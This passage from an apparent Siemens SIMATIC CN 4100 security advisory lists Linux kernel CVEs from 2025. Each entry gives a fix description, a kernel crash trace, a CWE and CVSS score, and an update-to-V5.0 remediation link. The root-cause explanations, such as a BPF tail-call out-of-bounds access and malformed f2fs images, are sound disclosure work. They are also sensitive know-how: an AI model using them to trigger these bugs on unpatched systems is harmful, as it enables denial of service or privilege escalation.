    Code: 24 18 e8 bb 2a 00 fd e9 1b df ff ff e8 b1 21 0f 00 e8 ec 5f c4 fc 44 0f b7 ac 24 b0 00 00 00 e9 54 f1 ff ff e8 d9 5f c4 fc 90 <0f> 0b 90 e9 b8 f4 ff ff e8 8b 2a 00 fd e9 8d e6 ff ff e8 81 2a 00
    RSP: 0018:ffff8880a3f08448 EFLAGS: 00010246
    RAX: 0000000000000000 RBX: ffff8880180a8000 RCX: ffffffff84afcf45
    RDX: ffff888090223700 RSI: ffffffff84afdaa7 RDI: 0000000000000001
    RBP: ffff888017955780 R08: 0000000000000001 R09: 0000000000000000
    R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000
    R13: ffff8880180a8910 R14: ffff8880a3e9d058 R15: 0000000000000000
    FS:  00005555791b8500(0000) GS:ffff88811c495000(0000) knlGS:0000000000000000
    CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    CR2: 000000110c2800b7 CR3: 0000000058e44000 CR4: 0000000000350ef0
    Call Trace:
     tcp_reset+0x26f/0x2b0 net/ipv4/tcp_input.c:4432
     tcp_validate_incoming+0x1057/0x1b60 net/ipv4/tcp_input.c:5975
     tcp_rcv_established+0x5b5/0x21f0 net/ipv4/tcp_input.c:6166
     tcp_v4_do_rcv+0x5dc/0xa70 net/ipv4/tcp_ipv4.c:1925
     tcp_v4_rcv+0x3473/0x44a0 net/ipv4/tcp_ipv4.c:2363
     ip_protocol_deliver_rcu+0xba/0x480 net/ipv4/ip_input.c:205
     ip_local_deliver_finish+0x2f1/0x500 net/ipv4/ip_input.c:233
     NF_HOOK include/linux/netfilter.h:317 [inline]
     NF_HOOK include/linux/netfilter.h:311 [inline]
     ip_local_deliver+0x1be/0x560 net/ipv4/ip_input.c:254
     dst_input include/net/dst.h:469 [inline]
     ip_rcv_finish net/ipv4/ip_input.c:447 [inline]
     NF_HOOK include/linux/netfilter.h:317 [inline]
     NF_HOOK include/linux/netfilter.h:311 [inline]
     ip_rcv+0x514/0x810 net/ipv4/ip_input.c:567
     __netif_receive_skb_one_core+0x197/0x1e0 net/core/dev.c:5975
     __netif_receive_skb+0x1f/0x120 net/core/dev.c:6088
     process_backlog+0x301/0x1360 net/core/dev.c:6440
     __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7453
     napi_poll net/core/dev.c:7517 [inline]
     net_rx_action+0xb44/0x1010 net/core/dev.c:7644
     handle_softirqs+0x1d0/0x770 kernel/softirq.c:579
     do_softirq+0x3f/0x90 kernel/softirq.c:480
     __local_bh_enable_ip+0xed/0x110 kernel/softirq.c:407
     local_bh_enable include/linux/bottom_half.h:33 [inline]
     inet_csk_listen_stop+0x2c5/0x1070 net/ipv4/inet_connection_sock.c:1524
     mptcp_check_listen_stop.part.0+0x1cc/0x220 net/mptcp/protocol.c:2985
     mptcp_check_listen_stop net/mptcp/mib.h:118 [inline]
     __mptcp_close+0x9b9/0xbd0 net/mptcp/protocol.c:3000
     mptcp_close+0x2f/0x140 net/mptcp/protocol.c:3066
     inet_release+0xed/0x200 net/ipv4/af_inet.c:435
     inet6_release+0x4f/0x70 net/ipv6/af_inet6.c:487
     __sock_release+0xb3/0x270 net/socket.c:649
     sock_close+0x1c/0x30 net/socket.c:1439
     __fput+0x402/0xb70 fs/file_table.c:465
     task_work_run+0x150/0x240 kernel/task_work.c:227
     resume_user_mode_work include/linux/resume_user_mode.h:50 [inline]
     exit_to_user_mode_loop+0xd4
    ---truncated---

Affected product: Siemens SIMATIC CN 4100 (status: known_affected)
Remediation (vendor fix): update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-667 Improper Locking
CVSS 3.1: base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38502

In the Linux kernel, the following vulnerability has been resolved:

bpf: Fix oob access in cgroup local storage

Lonial reported that an out-of-bounds access in cgroup local storage can be crafted via tail calls. Given two programs each utilizing a cgroup local storage with a different value size, and one program doing a tail call into the other. The verifier will validate each of the individual programs just fine. However, in the runtime context the bpf_cg_run_ctx holds a bpf_prog_array_item which contains the BPF program as well as any cgroup local storage flavor the program uses. Helpers such as bpf_get_local_storage() pick this up from the runtime context:

    ctx = container_of(current->bpf_ctx, struct bpf_cg_run_ctx, run_ctx);
    storage = ctx->prog_item->cgroup_storage[stype];

    if (stype == BPF_CGROUP_STORAGE_SHARED)
        ptr = &READ_ONCE(storage->buf)->data[0];
    else
        ptr = this_cpu_ptr(storage->percpu_buf);

For the second program which was called from the originally attached one, this means bpf_get_local_storage() will pick up the former program's map, not its own. With mismatching sizes, this can result in an unintended out-of-bounds access.

To fix this issue, we need to extend bpf_map_owner with an array of storage_cookie[] to match on i) the exact maps from the original program if the second program was using bpf_get_local_storage(), or ii) allow the tail call combination if the second program was not using any of the cgroup local storage maps.

Affected product: Siemens SIMATIC CN 4100 (status: known_affected)
Remediation (vendor fix): update to V5.0 or later, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-125 Out-of-bounds Read
CVSS 3.1: base score 4 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVE-2025-38552

In the Linux kernel, the following vulnerability has been resolved:

mptcp: plug races between subflow fail and subflow creation

We have races similar to the one addressed by the previous patch between subflow failing and additional subflow creation. They are just harder to trigger.

The solution is similar. Use a separate flag to track the condition 'socket state prevent any additional subflow creation' protected by the fallback lock.

The socket fallback makes such flag true, and also receiving or sending an MP_FAIL option.

The field 'allow_infinite_fallback' is now always touched under the relevant lock, we can drop the ONCE annotation on write.
View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H CVE-2025-38614 In the Linux kernel, the following vulnerability has been resolved: eventpoll: Fix semi-unbounded recursion Ensure that epoll instances can never form a graph deeper than EP_MAX_NESTS+1 links. Currently, ep_loop_check_proc() ensures that the graph is loop-free and does some recursion depth checks, but those recursion depth checks don't limit the depth of the resulting tree for two reasons: - They don't look upwards in the tree. - If there are multiple downwards paths of different lengths, only one of the paths is actually considered for the depth check since commit 28d82dc1c4ed ("epoll: limit paths"). Essentially, the current recursion depth check in ep_loop_check_proc() just serves to prevent it from recursing too deeply while checking for loops. A more thorough check is done in reverse_path_check() after the new graph edge has already been created; this checks, among other things, that no paths going upwards from any non-epoll file with a length of more than 5 edges exist. However, this check does not apply to non-epoll files. As a result, it is possible to recurse to a depth of at least roughly 500, tested on v6.15. (I am unsure if deeper recursion is possible; and this may have changed with commit 8c44dac8add7 ("eventpoll: Fix priority inversion problem").) To fix it: 1. In ep_loop_check_proc(), note the subtree depth of each visited node, and use subtree depths for the total depth calculation even when a subtree has already been visited. 2. Add ep_get_upwards_depth_proc() for similarly determining the maximum depth of an upwards walk. 3. 
In ep_loop_check(), use these values to limit the total path length between epoll nodes to EP_MAX_NESTS edges. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-674 Uncontrolled Recursion Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38670 In the Linux kernel, the following vulnerability has been resolved: arm64/entry: Mask DAIF in cpu_switch_to(), call_on_irq_stack() `cpu_switch_to()` and `call_on_irq_stack()` manipulate SP to change to different stacks along with the Shadow Call Stack if it is enabled. Those two stack changes cannot be done atomically and both functions can be interrupted by SErrors or Debug Exceptions which, though unlikely, is very much broken : if interrupted, we can end up with mismatched stacks and Shadow Call Stack leading to clobbered stacks. In `cpu_switch_to()`, it can happen when SP_EL0 points to the new task, but x18 stills points to the old task's SCS. When the interrupt handler tries to save the task's SCS pointer, it will save the old task SCS pointer (x18) into the new task struct (pointed to by SP_EL0), clobbering it. In `call_on_irq_stack()`, it can happen when switching from the task stack to the IRQ stack and when switching back. In both cases, we can be interrupted when the SCS pointer points to the IRQ SCS, but SP points to the task stack. The nested interrupt handler pushes its return addresses on the IRQ SCS. It then detects that SP points to the task stack, calls `call_on_irq_stack()` and clobbers the task SCS pointer with the IRQ SCS pointer, which it will also use ! This leads to tasks returning to addresses on the wrong SCS, or even on the IRQ SCS, triggering kernel panics via CONFIG_VMAP_STACK or FPAC if enabled. 
This is possible on a default config, but unlikely. However, when enabling CONFIG_ARM64_PSEUDO_NMI, DAIF is unmasked and instead the GIC is responsible for filtering what interrupts the CPU should receive based on priority. Given the goal of emulating NMIs, pseudo-NMIs can be received by the CPU even in `cpu_switch_to()` and `call_on_irq_stack()`, possibly *very* frequently depending on the system configuration and workload, leading to unpredictable kernel panics. Completely mask DAIF in `cpu_switch_to()` and restore it when returning. Do the same in `call_on_irq_stack()`, but restore and mask around the branch. Mask DAIF even if CONFIG_SHADOW_CALL_STACK is not enabled for consistency of behaviour between all configurations. Introduce and use an assembly macro for saving and masking DAIF, as the existing one saves but only masks IF. View CVE Details Affected Products Siemens SIMATIC Vendor: Siemens Product Version: SIMATIC CN 4100 Product Status: known_affected Remediations Vendor fix Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2025-38676 In the Linux kernel, the following vulnerability has been resolved: iommu/amd: Avoid stack buffer overflow from kernel cmdline While the kernel command line is considered trusted in most environments, avoid writing 1 byte past the end of "acpiid" if the "str" argument is maximum length. 
Relevant CWE: CWE-805 Buffer Access with Incorrect Length Value
Metrics: CVSS 3.1 base score 6 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

CVE-2025-38677
In the Linux kernel, the following vulnerability has been resolved:

f2fs: fix to avoid out-of-boundary access in dnode page

As Jiaming Zhang reported:

    __dump_stack lib/dump_stack.c:94 [inline]
    dump_stack_lvl+0x1c1/0x2a0 lib/dump_stack.c:120
    print_address_description mm/kasan/report.c:378 [inline]
    print_report+0x17e/0x800 mm/kasan/report.c:480
    kasan_report+0x147/0x180 mm/kasan/report.c:593
    data_blkaddr fs/f2fs/f2fs.h:3053 [inline]
    f2fs_data_blkaddr fs/f2fs/f2fs.h:3058 [inline]
    f2fs_get_dnode_of_data+0x1a09/0x1c40 fs/f2fs/node.c:855
    f2fs_reserve_block+0x53/0x310 fs/f2fs/data.c:1195
    prepare_write_begin fs/f2fs/data.c:3395 [inline]
    f2fs_write_begin+0xf39/0x2190 fs/f2fs/data.c:3594
    generic_perform_write+0x2c7/0x910 mm/filemap.c:4112
    f2fs_buffered_write_iter fs/f2fs/file.c:4988 [inline]
    f2fs_file_write_iter+0x1ec8/0x2410 fs/f2fs/file.c:5216
    new_sync_write fs/read_write.c:593 [inline]
    vfs_write+0x546/0xa90 fs/read_write.c:686
    ksys_write+0x149/0x250 fs/read_write.c:738
    do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
    do_syscall_64+0xf3/0x3d0 arch/x86/entry/syscall_64.c:94
    entry_SYSCALL_64_after_hwframe+0x77/0x7f

The root cause is that in the corrupted image there is a dnode that has the same node id as its inode, so during f2fs_get_dnode_of_data() it tries to access the block address in the dnode at offset 934; however, it parses the dnode as an inode node, so get_dnode_addr() returns 360, and it then tries to access the page address at 360 + 934 * 4 = 4096 w/ 4 bytes.

To fix this issue, let's add a sanity check for the node id of all direct nodes during f2fs_get_dnode_of_data().

Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS 3.1 base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38679
In the Linux kernel, the following vulnerability has been resolved:

media: venus: Fix OOB read due to missing payload bound check

Currently, the event_seq_changed() handler processes a variable number of properties sent by the firmware. The number of properties is indicated by the firmware and used to iterate over the payload. However, the payload size is not being validated against the actual message length. This can lead to out-of-bounds memory access if the firmware provides a property count that exceeds the data available in the payload. Such a condition can result in kernel crashes or potential information leaks if memory beyond the buffer is accessed.

Fix this by properly validating the remaining size of the payload before each property access and updating bounds accordingly as properties are parsed. This ensures that property parsing is safely bounded within the received message buffer and protects against malformed or malicious firmware behavior.
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS 3.1 base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38680
In the Linux kernel, the following vulnerability has been resolved:

media: uvcvideo: Fix 1-byte out-of-bounds read in uvc_parse_format()

The buffer length check before calling uvc_parse_format() only ensured that the buffer has at least 3 bytes (buflen > 2), but the function accesses buffer[3], requiring at least 4 bytes. This can lead to an out-of-bounds read if the buffer has exactly 3 bytes. Fix it by checking that the buffer has at least 4 bytes in uvc_parse_format().

Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS 3.1 base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38681
In the Linux kernel, the following vulnerability has been resolved:

mm/ptdump: take the memory hotplug lock inside ptdump_walk_pgd()

Memory hot remove unmaps and tears down various kernel page table regions as required. The ptdump code can race with concurrent modifications of the kernel page tables. When leaf entries are modified concurrently, the dump code may log stale or inconsistent information for a VA range, but this is otherwise not harmful. But when intermediate levels of kernel page table are freed, the dump code will continue to use memory that has been freed and potentially reallocated for another purpose. In such cases, the ptdump code may dereference bogus addresses, leading to a number of potential problems.

To avoid the above mentioned race condition, platforms such as arm64, riscv and s390 take the memory hotplug lock while dumping the kernel page table via the sysfs interface /sys/kernel/debug/kernel_page_tables. A similar race condition exists while checking for pages that might have been marked W+X via /sys/kernel/debug/kernel_page_tables/check_wx_pages, which in turn calls ptdump_check_wx(). Instead of solving this race condition again, let's just move the memory hotplug lock inside the generic ptdump_check_wx(), which will benefit both scenarios. Drop the get_online_mems() and put_online_mems() combination from all existing platform ptdump code paths.

Relevant CWE: CWE-366 Race Condition within a Thread
Metrics: CVSS 3.1 base score 6.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H

CVE-2025-38683
In the Linux kernel, the following vulnerability has been resolved:

hv_netvsc: Fix panic during namespace deletion with VF

The existing code moves the VF NIC to the new namespace when NETDEV_REGISTER is received on the netvsc NIC. During deletion of the namespace, default_device_exit_batch() >> default_device_exit_net() is called. When the netvsc NIC is moved back and registered to the default namespace, it automatically brings the VF NIC back to the default namespace.
This will cause the default_device_exit_net() >> for_each_netdev_safe loop to be unable to detect the list end, and hit a NULL ptr:

    [ 231.449420] mana 7870:00:00.0 enP30832s1: Moved VF to namespace with: eth0
    [ 231.449656] BUG: kernel NULL pointer dereference, address: 0000000000000010
    [ 231.450246] #PF: supervisor read access in kernel mode
    [ 231.450579] #PF: error_code(0x0000) - not-present page
    [ 231.450916] PGD 17b8a8067 P4D 0
    [ 231.451163] Oops: Oops: 0000 [#1] SMP NOPTI
    [ 231.451450] CPU: 82 UID: 0 PID: 1394 Comm: kworker/u768:1 Not tainted 6.16.0-rc4+ #3 VOLUNTARY
    [ 231.452042] Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS Hyper-V UEFI Release v4.1 11/21/2024
    [ 231.452692] Workqueue: netns cleanup_net
    [ 231.452947] RIP: 0010:default_device_exit_batch+0x16c/0x3f0
    [ 231.453326] Code: c0 0c f5 b3 e8 d5 db fe ff 48 85 c0 74 15 48 c7 c2 f8 fd ca b2 be 10 00 00 00 48 8d 7d c0 e8 7b 77 25 00 49 8b 86 28 01 00 00 <48> 8b 50 10 4c 8b 2a 4c 8d 62 f0 49 83 ed 10 4c 39 e0 0f 84 d6 00
    [ 231.454294] RSP: 0018:ff75fc7c9bf9fd00 EFLAGS: 00010246
    [ 231.454610] RAX: 0000000000000000 RBX: 0000000000000002 RCX: 61c8864680b583eb
    [ 231.455094] RDX: ff1fa9f71462d800 RSI: ff75fc7c9bf9fd38 RDI: 0000000030766564
    [ 231.455686] RBP: ff75fc7c9bf9fd78 R08: 0000000000000000 R09: 0000000000000000
    [ 231.456126] R10: 0000000000000001 R11: 0000000000000004 R12: ff1fa9f70088e340
    [ 231.456621] R13: ff1fa9f70088e340 R14: ffffffffb3f50c20 R15: ff1fa9f7103e6340
    [ 231.457161] FS: 0000000000000000(0000) GS:ff1faa6783a08000(0000) knlGS:0000000000000000
    [ 231.457707] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    [ 231.458031] CR2: 0000000000000010 CR3: 0000000179ab2006 CR4: 0000000000b73ef0
    [ 231.458434] Call Trace:
    [ 231.458600]
    [ 231.458777] ops_undo_list+0x100/0x220
    [ 231.459015] cleanup_net+0x1b8/0x300
    [ 231.459285] process_one_work+0x184/0x340

To fix it, move the ns change to a workqueue, and take rtnl_lock to avoid changing the netdev list when default_device_exit_net() is using it.

Relevant CWE: CWE-820 Missing Synchronization
Metrics: CVSS 3.1 base score 5.2 (MEDIUM), vector CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H

CVE-2025-38684
In the Linux kernel, the following vulnerability has been resolved:

net/sched: ets: use old 'nbands' while purging unused classes

Shuang reported the sch_ets test-case [1] crashing in ets_class_qlen_notify() after recent changes from Lion [2]. The problem is: in ets_qdisc_change() we purge unused DWRR queues; the value of 'q->nbands' is the new one, and the cleanup should be done with the old one. The problem has been here since my first attempts to fix ets_qdisc_change(), but it surfaced again after the recent qdisc len accounting fixes. Fix it by purging idle DWRR queues before assigning a new value of 'q->nbands', so that all purge operations find a consistent configuration:
- old 'q->nbands' because it's needed by ets_class_find()
- old 'q->nstrict' because it's needed by ets_class_is_strict()

    BUG: kernel NULL pointer dereference, address: 0000000000000000
    #PF: supervisor read access in kernel mode
    #PF: error_code(0x0000) - not-present page
    PGD 0 P4D 0
    Oops: Oops: 0000 [#1] SMP NOPTI
    CPU: 62 UID: 0 PID: 39457 Comm: tc Kdump: loaded Not tainted 6.12.0-116.el10.x86_64 #1 PREEMPT(voluntary)
    Hardware name: Dell Inc. PowerEdge R640/06DKY5, BIOS 2.12.2 07/09/2021
    RIP: 0010:__list_del_entry_valid_or_report+0x4/0x80
    Code: ff 4c 39 c7 0f 84 39 19 8e ff b8 01 00 00 00 c3 cc cc cc cc 66 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa <48> 8b 17 48 8b 4f 08 48 85 d2 0f 84 56 19 8e ff 48 85 c9 0f 84 ab
    RSP: 0018:ffffba186009f400 EFLAGS: 00010202
    RAX: 00000000000000d6 RBX: 0000000000000000 RCX: 0000000000000004
    RDX: ffff9f0fa29b69c0 RSI: 0000000000000000 RDI: 0000000000000000
    RBP: ffffffffc12c2400 R08: 0000000000000008 R09: 0000000000000004
    R10: ffffffffffffffff R11: 0000000000000004 R12: 0000000000000000
    R13: ffff9f0f8cfe0000 R14: 0000000000100005 R15: 0000000000000000
    FS: 00007f2154f37480(0000) GS:ffff9f269c1c0000(0000) knlGS:0000000000000000
    CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    CR2: 0000000000000000 CR3: 00000001530be001 CR4: 00000000007726f0
    DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
    DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
    PKRU: 55555554
    Call Trace:
    ets_class_qlen_notify+0x65/0x90 [sch_ets]
    qdisc_tree_reduce_backlog+0x74/0x110
    ets_qdisc_change+0x630/0xa40 [sch_ets]
    __tc_modify_qdisc.constprop.0+0x216/0x7f0
    tc_modify_qdisc+0x7c/0x120
    rtnetlink_rcv_msg+0x145/0x3f0
    netlink_rcv_skb+0x53/0x100
    netlink_unicast+0x245/0x390
    netlink_sendmsg+0x21b/0x470
    ____sys_sendmsg+0x39d/0x3d0
    ___sys_sendmsg+0x9a/0xe0
    __sys_sendmsg+0x7a/0xd0
    do_syscall_64+0x7d/0x160
    entry_SYSCALL_64_after_hwframe+0x76/0x7e
    RIP: 0033:0x7f2155114084
    Code: 89 02 b8 ff ff ff ff eb bb 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 80 3d 25 f0 0c 00 00 74 13 b8 2e 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 54 c3 0f 1f 00 48 83 ec 28 89 54 24 1c 48 89
    RSP: 002b:00007fff1fd7a988 EFLAGS: 00000202 ORIG_RAX: 000000000000002e
    RAX: ffffffffffffffda RBX: 0000560ec063e5e0 RCX: 00007f2155114084
    RDX: 0000000000000000 RSI: 00007fff1fd7a9f0 RDI: 0000000000000003
    RBP: 00007fff1fd7aa60 R08: 0000000000000010 R09: 000000000000003f
    R10: 0000560ee9b3a010 R11: 0000000000000202 R12: 00007fff1fd7aae0
    R13: 000000006891ccde R14: 0000560ec063e5e0 R15: 00007fff1fd7aad0

[1] https://lore.kernel.org/netdev/e08c7f4a6882f260011909a868311c6e9b54f3e4.1639153474.git.dcaratti@redhat.com/
[2] https://lore.kernel.org/netdev/d912cbd7-193b-4269-9857-525bee8bbb6a@gmail.com/

Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS 3.1 base score 5.2 (MEDIUM), vector CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H

CVE-2025-38685
In the Linux kernel, the following vulnerability has been resolved:

fbdev: Fix vmalloc out-of-bounds write in fast_imageblit

This issue triggers when a userspace program does an ioctl FBIOPUT_CON2FBMAP, passing a console number and a frame buffer number. Ideally this maps the console to the frame buffer and updates the screen if the console is visible. As part of the mapping it has to resize the console according to the frame buffer info. If this resize fails, it returns from vc_do_resize() and continues further. At this point the console and the new frame buffer are mapped and the display vars are set. Despite the failure it still proceeds to update the screen at later stages, where vc_data is related to the previous frame buffer while the frame buffer info and display vars are mapped to the new frame buffer, eventually leading to an out-of-bounds write in fast_imageblit(). This behaviour is expected only when fg_console is equal to the requested console, which is a visible console and updates the screen with invalid struct references in fbcon_putcs().
Relevant CWE: CWE-787 Out-of-bounds Write
Metrics: CVSS 3.1 base score 7.8 (HIGH), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38687
In the Linux kernel, the following vulnerability has been resolved:

comedi: fix race between polling and detaching

syzbot reports a use-after-free in comedi in the below link, which is due to comedi gladly removing the allocated async area even though poll requests are still active on the wait_queue_head inside of it. This can cause a use-after-free when the poll entries are later triggered or removed, as the memory for the wait_queue_head has been freed.

We need to check there are no tasks queued on any of the subdevices' wait queues before allowing the device to be detached by the `COMEDI_DEVCONFIG` ioctl. Tasks will read-lock `dev->attach_lock` before adding themselves to the subdevice wait queue, so fix the problem in the `COMEDI_DEVCONFIG` ioctl handler by write-locking `dev->attach_lock` before checking that all of the subdevices are safe to be deleted. This includes testing for any sleepers on the subdevices' wait queues. It remains locked until the device has been detached. This requires the `comedi_device_detach()` function to be refactored slightly, moving the bulk of it into new function `comedi_device_detach_locked()`.

Note that the refactor of `comedi_device_detach()` results in `comedi_device_cancel_all()` now being called while `dev->attach_lock` is write-locked, which wasn't the case previously, but that does not matter.

Thanks to Jens Axboe for diagnosing the problem and co-developing this patch.
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS 3.1 base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38691
In the Linux kernel, the following vulnerability has been resolved:

pNFS: Fix uninited ptr deref in block/scsi layout

The error occurs on the third attempt to encode extents. When function ext_tree_prepare_commit() reallocates a larger buffer to retry encoding extents, the "layoutupdate_pages" page array is initialized only after the retry loop. But ext_tree_free_commitdata() is called on every iteration and tries to put pages in the array, thus dereferencing uninitialized pointers.

An additional problem is that there is no limit on the maximum possible buffer_size. When there are too many extents, the client may create a layoutcommit that is larger than the maximum possible RPC size accepted by the server.

During testing, we observed two typical scenarios. First, one memory page for extents is enough when we work with small files, append data to the end of the file, or preallocate extents before writing. But when we fill a new large file without preallocating, the number of extents can be huge, and counting the number of written extents in ext_tree_encode_commit() does not help much. Since this number increases even more between unlocking and locking of ext_tree, the reallocated buffer may not be large enough again and again.
Relevant CWE: CWE-908 Use of Uninitialized Resource
Metrics: CVSS 3.1 base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38693
In the Linux kernel, the following vulnerability has been resolved:

media: dvb-frontends: w7090p: fix null-ptr-deref in w7090p_tuner_write_serpar and w7090p_tuner_read_serpar

In w7090p_tuner_write_serpar, msg is controlled by user. When msg[0].buf is null and msg[0].len is zero, the former checks on msg[0].buf would be passed. If msg[0].buf[2] is accessed without a sanity check, a null pointer deref would happen. We add a check on msg[0].len to prevent the crash.

Similar commit: commit 0ed554fd769a ("media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()")

Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS 3.1 base score 7 (HIGH), vector CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38694
In the Linux kernel, the following vulnerability has been resolved:

media: dvb-frontends: dib7090p: fix null-ptr-deref in dib7090p_rw_on_apb()

In dib7090p_rw_on_apb, msg is controlled by user. When msg[0].buf is null and msg[0].len is zero, the former checks on msg[0].buf would be passed. If msg[0].buf[2] is accessed without a sanity check, a null pointer deref would happen. We add a check on msg[0].len to prevent the crash. A similar issue occurs when accessing msg[1].buf[0] and msg[1].buf[1].

Similar commit: commit 0ed554fd769a ("media: dvb-usb: az6027: fix null-ptr-deref in az6027_i2c_xfer()")

Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS 3.1 base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38695
In the Linux kernel, the following vulnerability has been resolved:

scsi: lpfc: Check for hdwq null ptr when cleaning up lpfc_vport structure

If a call to lpfc_sli4_read_rev() from lpfc_sli4_hba_setup() fails, the resultant cleanup routine lpfc_sli4_vport_delete_fcp_xri_aborted() may occur before sli4_hba.hdwqs are allocated. This may result in a null pointer dereference when attempting to take the abts_io_buf_list_lock for the first hardware queue. Fix by adding a null ptr check on phba->sli4_hba.hdwq and an early return, because this situation means there must have been an error during port initialization.

Relevant CWE: CWE-476 NULL Pointer Dereference
Metrics: CVSS 3.1 base score 7 (HIGH), vector CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38696
In the Linux kernel, the following vulnerability has been resolved:

MIPS: Don't crash in stack_top() for tasks without ABI or vDSO

Not all tasks have an ABI associated or vDSO mapped; for example, kthreads never do. If such a task ever ends up calling stack_top(), it will dereference the NULL ABI pointer and crash. This can for example happen when using kunit:

    mips_stack_top+0x28/0xc0
    arch_pick_mmap_layout+0x190/0x220
    kunit_vm_mmap_init+0xf8/0x138
    __kunit_add_resource+0x40/0xa8
    kunit_vm_mmap+0x88/0xd8
    usercopy_test_init+0xb8/0x240
    kunit_try_run_case+0x5c/0x1a8
    kunit_generic_run_threadfn_adapter+0x28/0x50
    kthread+0x118/0x240
    ret_from_kernel_thread+0x14/0x1c

Only dereference the ABI pointer if it is set. The GIC page is also included, as it is specific to the vDSO. Also move the randomization adjustment into the same conditional.

Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS 3.1 base score 5.5 (MEDIUM), vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38697
In the Linux kernel, the following vulnerability has been resolved:

jfs: upper bound check of tree index in dbAllocAG

When computing the tree index in dbAllocAG, we never check if we are out of bounds relative to the size of the stree. This could happen in a scenario where the filesystem metadata are corrupted.

Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS 3.1 base score 7 (HIGH), vector CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38698
In the Linux kernel, the following vulnerability has been resolved:

jfs: Regular file corruption check

The reproducer builds a corrupted file on disk with a negative i_size value. Add a check when opening this file to avoid subsequent operation failures.
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS 3.1 base score 7 (HIGH), vector CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38699
In the Linux kernel, the following vulnerability has been resolved:

scsi: bfa: Double-free fix

When the bfad_im_probe() function fails during initialization, the memory pointed to by bfad->im is freed without setting bfad->im to NULL. Subsequently, during driver uninstallation, when the state machine enters the bfad_sm_stopping state and calls the bfad_im_probe_undo() function, it attempts to free the memory pointed to by bfad->im again, thereby triggering a double-free vulnerability. Set bfad->im to NULL if probing fails.

Relevant CWE: CWE-415 Double Free
Metrics: CVSS 3.1 base score 6.4 (MEDIUM), vector CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38700
In the Linux kernel, the following vulnerability has been resolved:

scsi: libiscsi: Initialize iscsi_conn->dd_data only if memory is allocated

